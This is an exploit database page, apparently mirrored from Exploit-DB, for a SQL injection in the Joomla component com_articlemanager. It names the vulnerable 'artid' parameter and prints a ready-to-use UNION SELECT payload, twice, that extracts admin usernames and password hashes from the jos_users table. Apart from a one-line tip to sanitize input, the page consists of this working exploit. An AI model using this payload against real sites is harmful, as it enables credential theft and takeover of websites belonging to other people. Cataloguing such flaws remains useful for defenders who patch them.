header-logo
Suggest Exploit
vendor:
com_articlemanager
by:
FL0RiX
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: com_articlemanager
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: Unknown
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Unknown

Joomla Component com_articlemanager SQL Injection Vulnerability

Admin login credentials can be obtained by exploiting a SQL injection vulnerability in the com_articlemanager component of Joomla. The vulnerable URL is http://[server]/index.php?option=com_articlemanager&Itemid=349&task=display&artid=. The exploit code is null/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rix,5,6,7,8/**/from/**/jos_users--

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

########################################################################
#        Joomla Component com_articlemanager SQL Injection Vulnerability
########################################################################
# Author   :FL0RiX
#
# Name     : com_articlemanager
#
# Bug Type   : SQL Injection
#
# Infection    : Admin login bilgileri alinabilir.
#
# Demo Vuln :
#
# http://[server]/index.php?option=com_articlemanager&Itemid=349&task=display&artid=
#
#EXPLOIT : null/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rix,5,6,7,8/**/from/**/jos_users--
########################################################################

Navigation

Suggest Exploit

Services By CQR